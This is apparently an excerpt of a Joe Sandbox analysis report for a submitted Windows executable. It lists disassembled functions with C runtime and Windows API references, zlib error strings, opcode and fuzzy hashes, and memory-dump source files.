                                                                                                                                                                                                                                        • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                        • Instruction ID: f1bd1f9af1b8c3dde052cdfff72e4ac990ab01f35945052f3e0611e1883df8a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69311072609B8186EB60AF60E8507FEB374FB84748F64443ADA4D47B95EF38D948C721
                                                                                                                                                                                                                                        Function 00007FF78DA75C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75CB5
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA75608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7561C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A9B8: GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF78DA6A94F,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6A979
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF78DA6A94F,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6A99E
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75CA4
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA75668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7567C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F1A
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F2B
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F3C
                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78DA7617C), ref: 00007FF78DA75F63
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                                        • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                        • Instruction ID: 380e9c40f5f464d1825334b1c62e30f69aef26554555d43a324aa17a0133fadb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCD1BF26A0C24286E724FF22D8409B9A761FF44784FF48035DA8D47696FE3DEC49C762
                                                                                                                                                                                                                                        Function 00007FF78DA6A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                        • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                        • Instruction ID: 210604521b80db3426c04160ad18cf429562a1300d879aa1a129ca8a08bda6d5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9318372608B8185DB20DF65E8406AEB3A0FB84758FB40135EA9D43B54EF3CC949CB11
                                                                                                                                                                                                                                        Function 00007FF78DA718E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                        • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                        • Instruction ID: a1bce2ff5b73ff05c9b725e7203ca6e01a96b3c41a64b0834b2eb27764de7e63
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69B19562B1C69281EA61AB6294009BAE3D1FB44BD4FB46531DA9D07B85FF3CEC49C311
                                                                                                                                                                                                                                        Function 00007FF78DA75EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F1A
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA75668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7567C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F2B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA75608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7561C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF78DA75F3C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA75638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA7564C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF78DA6A9B8: GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF78DA7617C), ref: 00007FF78DA75F63
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                                        • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                        • Instruction ID: fea08cdac5ad3856041eb7e56a9f0c347b4476cbce18b31b0108825ba6bba921
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE519332A0C64296E710FF31D8819A9E361BB48784FF48135DA9D47696FF3CE809C762
                                                                                                                                                                                                                                        Function 00007FF78DA5D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                        • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                        • Instruction ID: 2b82e7596788295ef3bd1dec6afb70ac7eef2c61660b935b4410f61e1dfb9a20
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C114822B18B05CAEB00DF60E8546B973B4FB19758FA40E31DA6D867A4EF38D558C391
                                                                                                                                                                                                                                        Function 00007FF78DA73C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                                                                        • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                        • Instruction ID: 2c9768a1783248fcb47ef6f90f8879f97d37fac820d64c1cc5e29d0f81a28156
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FFC1F472B1D68687D7249F59A044A6EF7A1F794B84FA18134DB9E43784EB3DEC05CB00
                                                                                                                                                                                                                                        Function 00007FF78DA5A4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                        • API String ID: 0-1127688429
                                                                                                                                                                                                                                        • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                        • Instruction ID: 849c8b57624331b01c8131944dec6a2fd84527bff38ca56907daa40ff57d8506
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4F1A362B0C2D68AE795AF158088F3ABAB9FF44744F764138DA4987390EB38EC44C751
                                                                                                                                                                                                                                        Function 00007FF78DA79798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                        • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                        • Instruction ID: 8817dd7386b36dc68a497dbf377de1813ced7801b2b5c1831d9a6151d9c6f7ea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFB1A073A09B858BEB15CF29C44676C77E0F784B48F248822DB9D837A4DB39D855C711
                                                                                                                                                                                                                                        Function 00007FF78DA63A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                                                                                        • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                        • Instruction ID: 19c9064343c1ab4556a3f1c8c8a7ceccb38be5c46be0971ff24c95a84bbfd161
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49E1C63A90C642C5EB68AE55A05093DB3A0FF45B48FB84535DA4E036D4EF2ADC4BC712
                                                                                                                                                                                                                                        Function 00007FF78DA5A34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                        • API String ID: 0-900081337
                                                                                                                                                                                                                                        • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                        • Instruction ID: 52bc5df55bb1ddff33e2093f64100d885bfd43fca29f19e67bb84d50666a6964
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D891C572A1C28687E7A49E55C448F3E7AB9FB44354F714139DA4A867C0EB3CED44CB12
                                                                                                                                                                                                                                        Function 00007FF78DA6DF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                        • API String ID: 0-3030954782
                                                                                                                                                                                                                                        • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                        • Instruction ID: 7ed6c8ffc3643cd78794621b8fe7ee0693c1bf3b2e1750e003330617e18c99dd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6517C22B1C2C186EB249E75A800B79A791F744B94FB9C231CB5847AC5EF3DD949C712
                                                                                                                                                                                                                                        Function 00007FF78DA70938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                                        • Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                                        • Instruction ID: 0f00d9e303f61a6806900034e7a54875e015c2910812862d717b3990b3df0eae
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A02A622A1E64340FA55BB61A440E7AE6A0BF45B90FF54534EDAD463D1FE3CEC09C326
                                                                                                                                                                                                                                        Function 00007FF78DA6DACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
